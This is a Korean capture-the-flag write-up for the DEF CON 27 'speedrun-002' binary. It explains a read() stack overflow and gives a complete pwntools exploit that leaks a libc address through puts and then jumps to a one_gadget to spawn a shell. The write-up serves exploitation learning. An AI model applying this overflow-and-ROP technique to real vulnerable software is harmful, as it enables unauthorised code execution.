Defcon27 Speedrun 002 Writeup

LeeDoHyun · March 2, 2020

이거 풀려고 한시간을 삽질했습니다.

[email protected]:/home/defcon27# file speedrun-002
speedrun-002: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/l, for GNU/Linux 3.2.0, BuildID[sha1]=fb0684e50a97ccfc5dbe71bcdcb4a45aacfed414, stripped

64비트 ELF파일입니다.

ssize_t __fastcall sub_400705(void *a1)
{
  puts("What an interesting thing to say.\nTell me more.");
  read(0, a1, 0x7DAuLL);                         // overflow
  return write(1, "Fascinating.\n", 0xDuLL);
}

해당 함수는 취약점이 터지는 함수입니다. read로 0x7DA 만큼 받기 때문에 오버플로우가 터집니다.

간단하게 pop_rdi, puts_plt, puts_got, ret을 구해줘서 원샷을 넣어주면 문제입니다.

ex.py

from pwn import *

context.log_level = "debug"
r = process("./speedrun-002")
e = ELF("./speedrun-002")
libc = e.libc

pop_rdi = 0x4008a3
puts_plt = e.plt["puts"]
puts_got = e.got["puts"]
ret = 0x400576
one_gadget = 0x4526a

r.recvuntil("What say you now?")
r.sendline("Everything intelligent is so boring.")
r.recvuntil("What an interesting thing to say.\nTell me more.")

payload = "A"*(0x400 + 0x8)
payload += p64(pop_rdi)
payload += p64(puts_got)
payload += p64(puts_plt)
payload += p64(ret)
r.sendline(payload)

r.recvuntil("Fascinating.\n")
puts_leak = u64(r.recv(6) + "\x00\x00")
info("puts leak = " + hex(puts_leak))
base = puts_leak - libc.symbols["puts"]
binsh = base + one_gadget

r.recvuntil("What say you now?")
r.sendline("Everything intelligent is so boring.")
r.recvuntil("What an interesting thing to say.\nTell me more.")

payload = "A"*(0x400 + 0x8)
payload += p64(binsh)
payload += p64(0) * 8
r.sendline(payload)
r.interactive()

Twitter, Facebook